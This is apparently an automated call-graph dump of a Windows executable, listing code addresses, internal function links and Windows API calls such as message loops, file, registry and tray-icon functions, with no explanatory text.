98828->98830 98829->98831 98831->98821 98832 112a00 98847 cd7b0 98832->98847 98833 cdb11 PeekMessageW 98833->98847 98834 cd807 GetInputState 98834->98833 98834->98847 98836 111cbe TranslateAcceleratorW 98836->98847 98837 cda04 timeGetTime 98837->98847 98838 cdb8f PeekMessageW 98838->98847 98839 cdb73 TranslateMessage DispatchMessageW 98839->98838 98840 cdbaf Sleep 98858 cdbc0 98840->98858 98841 112b74 Sleep 98841->98858 98842 de551 timeGetTime 98842->98858 98843 111dda timeGetTime 98949 de300 23 API calls 98843->98949 98846 112c0b GetExitCodeProcess 98850 112c21 WaitForSingleObject 98846->98850 98851 112c37 CloseHandle 98846->98851 98847->98833 98847->98834 98847->98836 98847->98837 98847->98838 98847->98839 98847->98840 98847->98841 98847->98843 98848 cd9d5 98847->98848 98860 cec40 207 API calls 98847->98860 98862 cbf40 207 API calls 98847->98862 98864 cdd50 98847->98864 98871 cdfd0 98847->98871 98894 d1310 98847->98894 98948 dedf6 IsDialogMessageW GetClassLongW 98847->98948 98950 133a2a 23 API calls 98847->98950 98951 13359c 82 API calls 98847->98951 98850->98847 98850->98851 98851->98858 98852 112a31 98852->98848 98853 1529bf GetForegroundWindow 98853->98858 98854 112ca9 Sleep 98854->98847 98858->98842 98858->98846 98858->98847 98858->98848 98858->98852 98858->98853 98858->98854 98952 145658 23 API calls 98858->98952 98953 12e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98858->98953 98954 12d4dc 47 API calls 98858->98954 98860->98847 98862->98847 98865 cdd6f 98864->98865 98866 cdd83 98864->98866 98955 cd260 207 API calls 98865->98955 98956 13359c 82 API calls 98866->98956 98869 cdd7a 98869->98847 98870 112f75 98870->98870 98873 ce010 98871->98873 98872 cec40 207 API calls 98889 ce0dc 98872->98889 98873->98889 98959 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98873->98959 98876 112fca 98879 ca961 22 API calls 98876->98879 98876->98889 98877 ce3e1 98877->98847 98878 ca961 22 API calls 98878->98889 98880 112fe4 98879->98880 98960 e00a3 29 API calls 98880->98960 98881 ca81b 41 API calls 98881->98889 98884 112fee 98961 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98884->98961 98889->98872 98889->98877 98889->98878 98889->98881 98890 d04f0 22 API calls 98889->98890 98891 13359c 82 API calls 98889->98891 98957 ca8c7 22 API calls 98889->98957 98958 da308 207 API calls 98889->98958 98962 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98889->98962 98963 e00a3 29 API calls 98889->98963 98964 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98889->98964 98965 1447d4 207 API calls 98889->98965 98966 1468c1 207 API calls 98889->98966 98890->98889 98891->98889 98895 d1376 98894->98895 98896 d17b0 98894->98896 98897 116331 98895->98897 98900 d1940 9 API calls 98895->98900 99088 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98896->99088 99047 14709c 98897->99047 98903 d13a0 98900->98903 98901 d17ba 98904 d17fb 98901->98904 98906 c9cb3 22 API calls 98901->98906 98902 11633d 98902->98847 98905 d1940 9 API calls 98903->98905 98908 116346 98904->98908 98910 d182c 98904->98910 98907 d13b6 98905->98907 98913 d17d4 98906->98913 98907->98904 98909 d13ec 98907->98909 99093 13359c 82 API calls 98908->99093 98909->98908 98919 d1408 98909->98919 99090 caceb 23 API calls 98910->99090 99089 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98913->99089 98914 d1839 99091 dd217 207 API calls 98914->99091 98917 11636e 99094 13359c 82 API calls 98917->99094 98918 d1872 98918->98897 99092 dfaeb 23 API calls 98918->99092 98919->98914 98919->98917 98926 dfddb 22 API calls 98919->98926 98927 dfe0b 22 API calls 98919->98927 98932 cec40 207 API calls 98919->98932 98933 d152f 98919->98933 98936 1163b2 98919->98936 98940 d15c7 98919->98940 98921 1163d1 99096 145745 54 API calls 98921->99096 98922 d153c 98924 d1940 9 API calls 98922->98924 98925 d1549 98924->98925 98929 d1940 9 API calls 98925->98929 98925->98940 98926->98919 98927->98919 98938 d1563 98929->98938 98931 d171d 98931->98847 98932->98919 98933->98921 98933->98922 98934 d1940 9 API calls 98934->98940 99095 13359c 82 API calls 98936->99095 98937 d167b 98937->98931 99087 dce17 22 API calls 98937->99087 98938->98940 99097 ca8c7 22 API calls 98938->99097 98940->98918 98940->98934 98940->98937 98967 c6246 98940->98967 98971 13f0ec 98940->98971 98980 c6216 98940->98980 98985 14958b 98940->98985 98988 1383da 98940->98988 98991 13744a 98940->98991 99098 13359c 82 API calls 98940->99098 98948->98847 98949->98847 98950->98847 98951->98847 98952->98858 98953->98858 98954->98858 98955->98869 98956->98870 98957->98889 98958->98889 98959->98876 98960->98884 98961->98889 98962->98889 98963->98889 98964->98889 98965->98889 98966->98889 98968 c625f 98967->98968 98969 c6250 98967->98969 98968->98969 98970 c6264 CloseHandle 98968->98970 98969->98940 98970->98969 98972 c7510 53 API calls 98971->98972 98973 13f126 98972->98973 99099 c9e90 98973->99099 98975 13f136 98976 13f15b 98975->98976 98977 cec40 207 API calls 98975->98977 98979 13f15f 98976->98979 99127 c9c6e 22 API calls 98976->99127 98977->98976 98979->98940 98981 c6246 CloseHandle 98980->98981 98982 c621e 98981->98982 98983 c6246 CloseHandle 98982->98983 98984 c622d 98983->98984 98984->98940 99140 147f59 98985->99140 98987 14959b 98987->98940 99233 1398e3 98988->99233 98990 1383ea 98990->98940 98992 137474 98991->98992 98993 137469 98991->98993 98995 137554 98992->98995 98998 ca961 22 API calls 98992->98998 99328 cb567 39 API calls 98993->99328 98996 dfddb 22 API calls 98995->98996 99045 1376a4 98995->99045 98997 137587 98996->98997 98999 dfe0b 22 API calls 98997->98999 99000 137495 98998->99000 99001 137598 98999->99001 99002 ca961 22 API calls 99000->99002 99004 c6246 CloseHandle 99001->99004 99003 13749e 99002->99003 99005 c7510 53 API calls 99003->99005 99006 1375a3 99004->99006 99007 1374aa 99005->99007 99008 ca961 22 API calls 99006->99008 99329 c525f 22 API calls 99007->99329 99010 1375ab 99008->99010 99012 c6246 CloseHandle 99010->99012 99011 1374bf 99013 c6350 22 API calls 99011->99013 99014 1375b2 99012->99014 99015 1374f2 99013->99015 99016 c7510 53 API calls 99014->99016 99017 13754a 99015->99017 99330 12d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 99015->99330 99018 1375be 99016->99018 99332 cb567 39 API calls 99017->99332 99020 c6246 CloseHandle 99018->99020 99023 1375c8 99020->99023 99022 137502 99022->99017 99024 137506 99022->99024 99025 c5745 5 API calls 99023->99025 99026 c9cb3 22 API calls 99024->99026 99027 1375e2 99025->99027 99028 137513 99026->99028 99029 1375ea 99027->99029 99030 1376de GetLastError 99027->99030 99331 12d2c1 26 API calls 99028->99331 99333 c53de 27 API calls 99029->99333 99032 1376f7 99030->99032 99034 c6216 CloseHandle 99032->99034 99034->99045 99035 13751c 99035->99017 99036 1375f8 99334 c53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99036->99334 99038 137645 99039 dfddb 22 API calls 99038->99039 99041 137679 99039->99041 99040 1375ff 99040->99038 99042 12ccff 4 API calls 99040->99042 99043 ca961 22 API calls 99041->99043 99042->99038 99044 137686 99043->99044 99044->99045 99335 12417d 22 API calls 99044->99335 99045->98940 99048 1470f5 99047->99048 99049 1470db 99047->99049 99336 145689 99048->99336 99347 13359c 82 API calls 99049->99347 99053 cec40 206 API calls 99054 147164 99053->99054 99055 1471a6 99054->99055 99056 1471ff 99054->99056 99058 1470ed 99054->99058 99063 130acc 22 API calls 99055->99063 99057 147253 99056->99057 99060 147205 99056->99060 99057->99058 99059 c7510 53 API calls 99057->99059 99058->98902 99061 147265 99059->99061 99348 131119 22 API calls 99060->99348 99064 caec9 22 API calls 99061->99064 99066 1471de 99063->99066 99067 147289 CharUpperBuffW 99064->99067 99065 147228 99349 ca673 22 API calls 99065->99349 99069 d1310 206 API calls 99066->99069 99071 1472a3 99067->99071 99069->99058 99070 147230 99074 cbf40 206 API calls 99070->99074 99072 1472f6 99071->99072 99073 1472aa 99071->99073 99075 c7510 53 API calls 99072->99075 99343 130acc 99073->99343 99074->99058 99076 1472fe 99075->99076 99350 de300 23 API calls 99076->99350 99080 d1310 206 API calls 99080->99058 99081 147308 99081->99058 99082 c7510 53 API calls 99081->99082 99083 147323 99082->99083 99351 ca673 22 API calls 99083->99351 99085 147333 99086 cbf40 206 API calls 99085->99086 99086->99058 99087->98937 99088->98901 99089->98904 99090->98914 99091->98918 99092->98918 99093->98940 99094->98940 99095->98940 99096->98938 99097->98940 99098->98940 99128 c6270 99099->99128 99101 c9fd2 99102 ca4a1 22 API calls 99101->99102 99103 c9fec 99102->99103 99103->98975 99106 ca6c3 22 API calls 99125 c9eb5 99106->99125 99107 10f7c4 99138 1296e2 84 API calls 99107->99138 99108 10f699 99113 dfddb 22 API calls 99108->99113 99110 ca405 99110->99103 99139 1296e2 84 API calls 99110->99139 99116 10f754 99113->99116 99114 10f7d2 99115 ca4a1 22 API calls 99114->99115 99117 10f7e8 99115->99117 99118 dfe0b 22 API calls 99116->99118 99117->99103 99120 ca12c 99118->99120 99120->99107 99120->99110 99121 ca587 22 API calls 99121->99125 99122 caec9 22 API calls 99123 ca0db CharUpperBuffW 99122->99123 99134 ca673 22 API calls 99123->99134 99125->99101 99125->99106 99125->99107 99125->99108 99125->99110 99125->99120 99125->99121 99125->99122 99126 ca4a1 22 API calls 99125->99126 99133 c4573 41 API calls 99125->99133 99135 c48c8 23 API calls 99125->99135 99136 c49bd 22 API calls 99125->99136 99137 ca673 22 API calls 99125->99137 99126->99125 99127->98979 99129 dfe0b 22 API calls 99128->99129 99130 c6295 99129->99130 99131 dfddb 22 API calls 99130->99131 99132 c62a3 99131->99132 99132->99125 99133->99125 99134->99125 99135->99125 99136->99125 99137->99125 99138->99114 99139->99103 99141 c7510 53 API calls 99140->99141 99142 147f90 99141->99142 99166 147fd5 99142->99166 99178 148cd3 99142->99178 99144 148281 99145 14844f 99144->99145 99150 14828f 99144->99150 99219 148ee4 60 API calls 99145->99219 99148 14845e 99148->99150 99151 14846a 99148->99151 99149 c7510 53 API calls 99168 148049 99149->99168 99191 147e86 99150->99191 99151->99166 99156 1482c8 99206 dfc70 99156->99206 99159 148302 99213 c63eb 22 API calls 99159->99213 99160 1482e8 99212 13359c 82 API calls 99160->99212 99163 1482f3 GetCurrentProcess TerminateProcess 99163->99159 99164 148311 99214 c6a50 22 API calls 99164->99214 99166->98987 99167 14832a 99176 148352 99167->99176 99215 d04f0 22 API calls 99167->99215 99168->99144 99168->99149 99168->99166 99210 12417d 22 API calls 99168->99210 99211 14851d 42 API calls 99168->99211 99169 1484c5 99169->99166 99174 1484d9 FreeLibrary 99169->99174 99171 148341 99216 148b7b 75 API calls 99171->99216 99174->99166 99176->99169 99217 d04f0 22 API calls 99176->99217 99218 caceb 23 API calls 99176->99218 99220 148b7b 75 API calls 99176->99220 99179 caec9 22 API calls 99178->99179 99180 148cee CharLowerBuffW 99179->99180 99221 128e54 99180->99221 99184 ca961 22 API calls 99185 148d2a 99184->99185 99228 c6d25 22 API calls 99185->99228 99187 148d3e 99188 c93b2 22 API calls 99187->99188 99190 148d48 99188->99190 99189 148e5e 99189->99168 99190->99189 99229 14851d 42 API calls 99190->99229 99192 147ea1 99191->99192 99193 147eec 99191->99193 99194 dfe0b 22 API calls 99192->99194 99197 149096 99193->99197 99195 147ec3 99194->99195 99195->99193 99196 dfddb 22 API calls 99195->99196 99196->99195 99198 1492ab 99197->99198 99202 1490ba 99197->99202 99198->99156 99199 cb38f 39 API calls 99199->99202 99200 cb567 39 API calls 99200->99202 99201 cb6b5 39 API calls 99201->99202 99202->99198 99202->99199 99202->99200 99202->99201 99203 c7510 53 API calls 99202->99203 99204 eea0c 21 API calls 99202->99204 99232 12efae 24 API calls 99202->99232 99203->99202 99204->99202 99208 dfc85 99206->99208 99207 dfd1d VirtualProtect 99209 dfceb 99207->99209 99208->99207 99208->99209 99209->99159 99209->99160 99210->99168 99211->99168 99212->99163 99213->99164 99214->99167 99215->99171 99216->99176 99217->99176 99218->99176 99219->99148 99220->99176 99223 128e74 99221->99223 99222 128f63 99222->99184 99222->99190 99223->99222 99224 128f68 99223->99224 99226 128ea9 99223->99226 99224->99222 99231 dce60 41 API calls 99224->99231 99226->99222 99230 dce60 41 API calls 99226->99230 99228->99187 99229->99189 99230->99226 99231->99224 99232->99202 99234 139902 99233->99234 99235 1399e8 99233->99235 99237 dfddb 22 API calls 99234->99237 99302 139caa 39 API calls 99235->99302 99238 139909 99237->99238 99239 dfe0b 22 API calls 99238->99239 99241 13991a 99239->99241 99240 1399ca 99240->98990 99242 c6246 CloseHandle 99241->99242 99244 139925 99242->99244 99243 139ac5 99284 131e96 99243->99284 99246 ca961 22 API calls 99244->99246 99249 13992d 99246->99249 99247 139acc 99288 12ccff 99247->99288 99248 1399a2 99248->99240 99248->99243 99250 139a33 99248->99250 99252 c6246 CloseHandle 99249->99252 99251 c7510 53 API calls 99250->99251 99255 139a3a 99251->99255 99253 139934 99252->99253 99257 c7510 53 API calls 99253->99257 99256 139abb 99255->99256 99278 139a6e 99255->99278 99314 12cd57 30 API calls 99256->99314 99260 139940 99257->99260 99258 139aa8 99258->99240 99263 c6246 CloseHandle 99258->99263 99262 c6246 CloseHandle 99260->99262 99261 c6270 22 API calls 99264 139a7e 99261->99264 99265 13994a 99262->99265 99266 139b1e 99263->99266 99267 139a8e 99264->99267 99303 ca8c7 22 API calls 99264->99303 99292 c5745 99265->99292 99270 c6216 CloseHandle 99266->99270 99304 c33c6 99267->99304 99270->99240 99274 1399c2 99277 c6216 CloseHandle 99274->99277 99275 13995d 99300 c53de 27 API calls 99275->99300 99277->99240 99278->99261 99280 13996b 99301 c53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99280->99301 99282 139972 99282->99248 99283 12ccff 4 API calls 99282->99283 99283->99248 99285 131ea4 99284->99285 99286 131e9f 99284->99286 99285->99247 99315 130f67 24 API calls 99286->99315 99289 12cd19 WriteFile 99288->99289 99290 12cd0e 99288->99290 99289->99258 99316 12cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99290->99316 99293 c575c CreateFileW 99292->99293 99294 104035 99292->99294 99295 c577b 99293->99295 99294->99295 99296 10403b CreateFileW 99294->99296 99295->99274 99295->99275 99296->99295 99297 104063 99296->99297 99317 c54c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99297->99317 99299 10406e 99299->99295 99300->99280 99301->99282 99302->99248 99303->99267 99305 c33dd 99304->99305 99306 1030bb 99304->99306 99318 c33ee 99305->99318 99308 dfddb 22 API calls 99306->99308 99310 1030c5 99308->99310 99309 c33e8 99313 12cd57 30 API calls 99309->99313 99311 dfe0b 22 API calls 99310->99311 99312 1030fe 99311->99312 99313->99258 99314->99258 99315->99285 99316->99289 99317->99299 99319 c33fe 99318->99319 99320 10311d 99319->99320 99321 c3411 99319->99321 99323 dfddb 22 API calls 99320->99323 99322 ca587 22 API calls 99321->99322 99324 c341e 99322->99324 99325 103127 99323->99325 99324->99309 99326 dfe0b 22 API calls 99325->99326 99327 103157 99326->99327 99328->98992 99329->99011 99330->99022 99331->99035 99332->98995 99333->99036 99334->99040 99335->99045 99337 1456f2 99336->99337 99338 1456a4 99336->99338 99337->99053 99339 dfe0b 22 API calls 99338->99339 99340 1456c6 99339->99340 99340->99337 99341 dfddb 22 API calls 99340->99341 99352 130a59 22 API calls 99340->99352 99341->99340 99344 130ada 99343->99344 99346 130b13 99343->99346 99345 dfddb 22 API calls 99344->99345 99344->99346 99345->99346 99346->99080 99347->99058 99348->99065 99349->99070 99350->99081 99351->99085 99352->99340 99353 cf7bf 99354 cfcb6 99353->99354 99355 cf7d3 99353->99355 99390 caceb 23 API calls 99354->99390 99357 cfcc2 99355->99357 99358 dfddb 22 API calls 99355->99358 99391 caceb 23 API calls 99357->99391 99360 cf7e5 99358->99360 99360->99357 99361 cf83e 99360->99361 99362 cfd3d 99360->99362 99364 d1310 207 API calls 99361->99364 99370 ced9d 99361->99370 99392 131155 22 API calls 99362->99392 99369 cec76 99364->99369 99365 dfddb 22 API calls 99365->99369 99366 114beb 99398 13359c 82 API calls 99366->99398 99368 cfef7 99368->99370 99394 ca8c7 22 API calls 99368->99394 99369->99365 99369->99366 99369->99368 99369->99370 99371 cf3ae 99369->99371 99373 114b0b 99369->99373 99374 114600 99369->99374 99378 ca8c7 22 API calls 99369->99378 99381 e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99369->99381 99382 cfbe3 99369->99382 99383 ca961 22 API calls 99369->99383 99386 e00a3 29 API calls 99369->99386 99387 e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99369->99387 99388 d01e0 207 API calls 99369->99388 99389 d06a0 41 API calls 99369->99389 99371->99370 99395 13359c 82 API calls 99371->99395 99396 13359c 82 API calls 99373->99396 99374->99370 99393 ca8c7 22 API calls 99374->99393 99378->99369 99381->99369 99382->99370 99382->99371 99384 114bdc 99382->99384 99383->99369 99397 13359c 82 API calls 99384->99397 99386->99369 99387->99369 99388->99369 99389->99369 99390->99357 99391->99362 99392->99370 99393->99370 99394->99370 99395->99370 99396->99370 99397->99366 99398->99370 99399 c1098 99404 c42de 99399->99404 99403 c10a7 99405 ca961 22 API calls 99404->99405 99406 c42f5 GetVersionExW 99405->99406 99407 c6b57 22 API calls 99406->99407 99408 c4342 99407->99408 99409 c93b2 22 API calls 99408->99409 99421 c4378 99408->99421 99410 c436c 99409->99410 99412 c37a0 22 API calls 99410->99412 99411 c441b GetCurrentProcess IsWow64Process 99413 c4437 99411->99413 99412->99421 99414 c444f LoadLibraryA 99413->99414 99415 103824 GetSystemInfo 99413->99415 99416 c449c GetSystemInfo 99414->99416 99417 c4460 GetProcAddress 99414->99417 99418 c4476 99416->99418 99417->99416 99420 c4470 GetNativeSystemInfo 99417->99420 99422 c447a FreeLibrary 99418->99422 99423 c109d 99418->99423 99419 1037df 99420->99418 99421->99411 99421->99419 99422->99423 99424 e00a3 29 API calls 99423->99424 99424->99403 99425 102ba5 99426 c2b25 99425->99426 99427 102baf 99425->99427 99453 c2b83 7 API calls 99426->99453 99468 c3a5a 99427->99468 99431 102bb8 99433 c9cb3 22 API calls 99431->99433 99435 102bc6 99433->99435 99434 c2b2f 99446 c2b44 99434->99446 99457 c3837 99434->99457 99436 102bf5 99435->99436 99437 102bce 99435->99437 99440 c33c6 22 API calls 99436->99440 99438 c33c6 22 API calls 99437->99438 99442 102bd9 99438->99442 99441 102bf1 GetForegroundWindow ShellExecuteW 99440->99441 99447 102c26 99441->99447 99444 c6350 22 API calls 99442->99444 99448 102be7 99444->99448 99445 c2b5f 99450 c2b66 SetCurrentDirectoryW 99445->99450 99446->99445 99467 c30f2 Shell_NotifyIconW 99446->99467 99447->99445 99451 c33c6 22 API calls 99448->99451 99452 c2b7a 99450->99452 99451->99441 99475 c2cd4 7 API calls 99453->99475 99455 c2b2a 99456 c2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99455->99456 99456->99434 99458 c3862 99457->99458 99476 c4212 99458->99476 99461 c38e8 99463 103386 Shell_NotifyIconW 99461->99463 99464 c3906 Shell_NotifyIconW 99461->99464 99480 c3923 99464->99480 99466 c391c 99466->99446 99467->99445 99469 101f50 99468->99469 99470 c3a67 GetModuleFileNameW 99469->99470 99471 c9cb3 22 API calls 99470->99471 99472 c3a8d 99471->99472 99473 c3aa2 23 API calls 99472->99473 99474 c3a97 99473->99474 99474->99431 99475->99455 99477 1035a4 99476->99477 99478 c38b7 99476->99478 99477->99478 99479 1035ad DestroyIcon 99477->99479 99478->99461 99502 12c874 42 API calls 99478->99502 99479->99478 99481 c393f 99480->99481 99482 c3a13 99480->99482 99483 c6270 22 API calls 99481->99483 99482->99466 99484 c394d 99483->99484 99485 103393 LoadStringW 99484->99485 99486 c395a 99484->99486 99488 1033ad 99485->99488 99487 c6b57 22 API calls 99486->99487 99489 c396f 99487->99489 99496 c3994 99488->99496 99503 ca8c7 22 API calls 99488->99503 99490 c397c 99489->99490 99491 1033c9 99489->99491 99490->99488 99493 c3986 99490->99493 99494 c6350 22 API calls 99491->99494 99495 c6350 22 API calls 99493->99495 99497 1033d7 99494->99497 99495->99496 99499 c39f9 Shell_NotifyIconW 99496->99499 99497->99496 99498 c33c6 22 API calls 99497->99498 99500 1033f9 99498->99500 99499->99482 99501 c33c6 22 API calls 99500->99501 99501->99496 99502->99461 99503->99496 99504 e03fb 99505 e0407 99504->99505 99533 dfeb1 99505->99533 99507 e040e 99508 e0561 99507->99508 99511 e0438 99507->99511 99560 e083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 99508->99560 99510 e0568 99561 e4e52 28 API calls 99510->99561 99522 e0477 99511->99522 99544 f247d 99511->99544 99513 e056e 99562 e4e04 28 API calls 99513->99562 99517 e0576 99518 e0457 99520 e04d8 99552 e0959 99520->99552 99522->99520 99556 e4e1a 38 API calls 99522->99556 99524 e04de 99525 e04f3 99524->99525 99557 e0992 GetModuleHandleW 99525->99557 99527 e04fa 99527->99510 99528 e04fe 99527->99528 99529 e0507 99528->99529 99558 e4df5 28 API calls 99528->99558 99559 e0040 13 API calls 99529->99559 99532 e050f 99532->99518 99534 dfeba 99533->99534 99563 e0698 IsProcessorFeaturePresent 99534->99563 99536 dfec6 99564 e2c94 10 API calls 99536->99564 99538 dfecb 99539 dfecf 99538->99539 99565 f2317 99538->99565 99539->99507 99542 dfee6 99542->99507 99547 f2494 99544->99547 99545 e0a8c 5 API calls 99546 e0451 99545->99546 99546->99518 99548 f2421 99546->99548 99547->99545 99550 f2450 99548->99550 99549 e0a8c 5 API calls 99551 f2479 99549->99551 99550->99549 99551->99522 99616 e2340 99552->99616 99555 e097f 99555->99524 99556->99520 99557->99527 99558->99529 99559->99532 99560->99510 99561->99513 99562->99517 99563->99536 99564->99538 99569 fd1f6 99565->99569 99568 e2cbd 8 API calls 99568->99539 99570 fd20f 99569->99570 99571 fd213 99569->99571 99587 e0a8c 99570->99587 99571->99570 99575 f4bfb 99571->99575 99573 dfed8 99573->99542 99573->99568 99576 f4c07 99575->99576 99594 f2f5e EnterCriticalSection 99576->99594 99578 f4c0e 99595 f50af 99578->99595 99580 f4c1d 99581 f4c2c 99580->99581 99608 f4a8f 29 API calls 99580->99608 99610 f4c48 LeaveCriticalSection 99581->99610 99584 f4c27 99609 f4b45 GetStdHandle GetFileType 99584->99609 99585 f4c3d 99585->99571 99588 e0a97 IsProcessorFeaturePresent 99587->99588 99589 e0a95 99587->99589 99591 e0c5d 99588->99591 99589->99573 99615 e0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99591->99615 99593 e0d40 99593->99573 99594->99578 99596 f50bb 99595->99596 99597 f50df 99596->99597 99598 f50c8 99596->99598 99611 f2f5e EnterCriticalSection 99597->99611 99612 ef2d9 20 API calls 99598->99612 99601 f50cd 99613 f27ec 26 API calls 99601->99613 99603 f5117 99614 f513e LeaveCriticalSection 99603->99614 99604 f50d7 99604->99580 99606 f5000 21 API calls 99607 f50eb 99606->99607 99607->99603 99607->99606 99608->99584 99609->99581 99610->99585 99611->99607 99612->99601 99613->99604 99614->99604 99615->99593 99617 e096c GetStartupInfoW 99616->99617 99617->99555 99618 c105b 99623 c344d 99618->99623 99620 c106a 99654 e00a3 29 API calls 99620->99654 99622 c1074 99624 c345d 99623->99624 99625 ca961 22 API calls 99624->99625 99626 c3513 99625->99626 99627 c3a5a 24 API calls 99626->99627 99628 c351c 99627->99628 99655 c3357 99628->99655 99631 c33c6 22 API calls 99632 c3535 99631->99632 99633 c515f 22 API calls 99632->99633 99634 c3544 99633->99634 99635 ca961 22 API calls 99634->99635 99636 c354d 99635->99636 99637 ca6c3 22 API calls 99636->99637 99638 c3556 RegOpenKeyExW 99637->99638 99639 103176 RegQueryValueExW 99638->99639 99645 c3578 99638->99645 99640 103193 99639->99640 99641 10320c RegCloseKey 99639->99641 99642 dfe0b 22 API calls 99640->99642 99643 10321e 99641->99643 99641->99645 99644 1031ac 99642->99644 99643->99645 99648 c4c6d 22 API calls 99643->99648 99652 c9cb3 22 API calls 99643->99652 99653 c515f 22 API calls 99643->99653 99646 c5722 22 API calls 99644->99646 99645->99620 99647 1031b7 RegQueryValueExW 99646->99647 99649 1031d4 99647->99649 99651 1031ee 99647->99651 99648->99643 99650 c6b57 22 API calls 99649->99650 99650->99651 99651->99641 99652->99643 99653->99643 99654->99622 99656 101f50 99655->99656 99657 c3364 GetFullPathNameW 99656->99657 99658 c3386 99657->99658 99659 c6b57 22 API calls 99658->99659 99660 c33a4 99659->99660 99660->99631 99661 c3156 99664 c3170 99661->99664 99665 c3187 99664->99665 99666 c318c 99665->99666 99667 c31eb 99665->99667 99702 c31e9 99665->99702 99668 c3199 99666->99668 99669 c3265 PostQuitMessage 99666->99669 99671 102dfb 99667->99671 99672 c31f1 99667->99672 99674 c31a4 99668->99674 99675 102e7c 99668->99675 99706 c316a 99669->99706 99670 c31d0 DefWindowProcW 99670->99706 99713 c18e2 10 API calls 99671->99713 99676 c321d SetTimer RegisterWindowMessageW 99672->99676 99677 c31f8 99672->99677 99679 c31ae 99674->99679 99680 102e68 99674->99680 99718 12bf30 34 API calls 99675->99718 99681 c3246 CreatePopupMenu 99676->99681 99676->99706 99683 102d9c 99677->99683 99684 c3201 KillTimer 99677->99684 99678 102e1c 99714 de499 42 API calls 99678->99714 99687 c31b9 99679->99687 99688 102e4d 99679->99688 99717 12c161 27 API calls 99680->99717 99681->99706 99690 102da1 99683->99690 99691 102dd7 MoveWindow 99683->99691 99709 c30f2 Shell_NotifyIconW 99684->99709 99694 c3253 99687->99694 99699 c31c4 99687->99699 99688->99670 99716 120ad7 22 API calls 99688->99716 99689 102e8e 99689->99670 99689->99706 99695 102dc6 SetFocus 99690->99695 99696 102da7 99690->99696 99691->99706 99693 c3214 99710 c3c50 DeleteObject DestroyWindow 99693->99710 99711 c326f 44 API calls 99694->99711 99695->99706 99696->99699 99700 102db0 99696->99700 99699->99670 99715 c30f2 Shell_NotifyIconW 99699->99715 99712 c18e2 10 API calls 99700->99712 99702->99670 99703 c3263 99703->99706 99707 102e41 99708 c3837 49 API calls 99707->99708 99708->99702 99709->99693 99710->99706 99711->99703 99712->99706 99713->99678 99714->99699 99715->99707 99716->99702 99717->99703 99718->99689 99719 c2e37 99720 ca961 22 API calls 99719->99720 99721 c2e4d 99720->99721 99798 c4ae3 99721->99798 99723 c2e6b 99724 c3a5a 24 API calls 99723->99724 99725 c2e7f 99724->99725 99726 c9cb3 22 API calls 99725->99726 99727 c2e8c 99726->99727 99728 c4ecb 94 API calls 99727->99728 99729 c2ea5 99728->99729 99730 102cb0 99729->99730 99731 c2ead 99729->99731 99732 132cf9 80 API calls 99730->99732 99812 ca8c7 22 API calls 99731->99812 99733 102cc3 99732->99733 99734 102ccf 99733->99734 99736 c4f39 68 API calls 99733->99736 99740 c4f39 68 API calls 99734->99740 99736->99734 99737 c2ec3 99813 c6f88 22 API calls 99737->99813 99739 c2ecf 99741 c9cb3 22 API calls 99739->99741 99742 102ce5 99740->99742 99743 c2edc 99741->99743 99828 c3084 22 API calls 99742->99828 99744 ca81b 41 API calls 99743->99744 99746 c2eec 99744->99746 99748 c9cb3 22 API calls 99746->99748 99747 102d02 99829 c3084 22 API calls 99747->99829 99750 c2f12 99748->99750 99752 ca81b 41 API calls 99750->99752 99751 102d1e 99753 c3a5a 24 API calls 99751->99753 99755 c2f21 99752->99755 99754 102d44 99753->99754 99830 c3084 22 API calls 99754->99830 99757 ca961 22 API calls 99755->99757 99759 c2f3f 99757->99759 99758 102d50 99831 ca8c7 22 API calls 99758->99831 99814 c3084 22 API calls 99759->99814 99762 102d5e 99832 c3084 22 API calls 99762->99832 99763 c2f4b 99815 e4a28 40 API calls 99763->99815 99766 102d6d 99833 ca8c7 22 API calls 99766->99833 99767 c2f59 99767->99742 99768 c2f63 99767->99768 99816 e4a28 40 API calls 99768->99816 99771 102d83 99834 c3084 22 API calls 99771->99834 99772 c2f6e 99772->99747 99774 c2f78 99772->99774 99817 e4a28 40 API calls 99774->99817 99775 102d90 99777 c2f83 99777->99751 99778 c2f8d 99777->99778 99818 e4a28 40 API calls 99778->99818 99780 c2f98 99781 c2fdc 99780->99781 99819 c3084 22 API calls 99780->99819 99781->99766 99782 c2fe8 99781->99782 99782->99775 99822 c63eb 22 API calls 99782->99822 99784 c2fbf 99820 ca8c7 22 API calls 99784->99820 99787 c2ff8 99823 c6a50 22 API calls 99787->99823 99788 c2fcd 99821 c3084 22 API calls 99788->99821 99791 c3006 99824 c70b0 23 API calls 99791->99824 99793 c3021 99796 c3065 99793->99796 99825 c6f88 22 API calls 99793->99825 99826 c70b0 23 API calls 99793->99826 99827 c3084 22 API calls 99793->99827 99799 c4af0 99798->99799 99800 c6b57 22 API calls 99799->99800 99801 c4b22 99799->99801 99800->99801 99809 c4b58 99801->99809 99835 c4c6d 99801->99835 99803 c9cb3 22 API calls 99805 c4c52 99803->99805 99804 c9cb3 22 API calls 99804->99809 99807 c515f 22 API calls 99805->99807 99806 c4c6d 22 API calls 99806->99809 99808 c4c5e 99807->99808 99808->99723 99809->99804 99809->99806 99810 c515f 22 API calls 99809->99810 99811 c4c29 99809->99811 99810->99809 99811->99803 99811->99808 99812->99737 99813->99739 99814->99763 99815->99767 